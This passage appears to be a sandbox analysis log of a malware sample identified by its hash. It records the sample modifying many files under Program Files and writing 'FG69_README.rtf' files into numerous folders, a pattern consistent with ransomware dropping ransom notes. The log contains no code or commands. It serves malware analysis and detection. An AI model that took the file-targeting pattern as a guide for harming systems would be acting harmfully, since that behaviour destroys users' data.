d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\jfr\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Monterrey d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfo.zip d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Tripoli d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.commands.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\YST9 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-heapwalker_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_zh_HK.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\http.luac d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ashgabat d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\javaws.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Ceuta d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Yellowknife d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Qyzylorda d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\dsn.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Windows Journal\Templates\Genko_2.jtp d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Manila d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\zi\America\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\tzmappings d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\kinit.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\reader_sl.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Kiritimati d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\dnsns.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Bahia d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\TraceRegister.docx d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\LICENSE d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\EScript.api d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_winxp.css d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Gaza d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-ui.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\te.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.jsp.jasper.registry_1.0.300.v20130327-1442.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Tirane d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-progress-ui_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\ECLIPSE_.SF d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\net.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\doclib.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Palmer d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Pohnpei d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Interface.zip d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-tabcontrol_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\tesselate.x3d d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.clusters d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Lord_Howe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\management\snmp.acl.template d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Reykjavik d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Montevideo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Anchorage d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Casey d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Informix.xsl d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\skins\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\about.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Antigua d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Adelaide d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Porto_Velho d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_pt_BR.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer_3.2.200.v20140827-1444.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh88 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-explorer_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Bangkok d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings_0.10.200.v20140424-2042.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Ndjamena d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Visualizer.zip d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jmc.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\StopComplete.xhtml d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.STD d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\license.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Costa_Rica d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Majuro d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.attributeTransformation.exsd d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Rainy_River d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\LINEAR_RGB.pf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\mc.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-javahelp_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yerevan d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring-impl.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.continuation_8.1.14.v20131031.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui.ja_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\xul.dll.sig d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Installer\setup.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\java-rmi.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-editor-mimelookup.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-progress-ui.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\org-netbeans-core-windows_visualvm.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cancun d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-search_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\sd\jamendo.luac d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\da.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Monaco d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\stopNetworkServer.bat d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Adak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\sa-jdi.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\ui.js d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Barbados d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\title.htm d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derby.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse_1.1.200.v20140414-0825.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Khartoum d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Tbilisi d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program 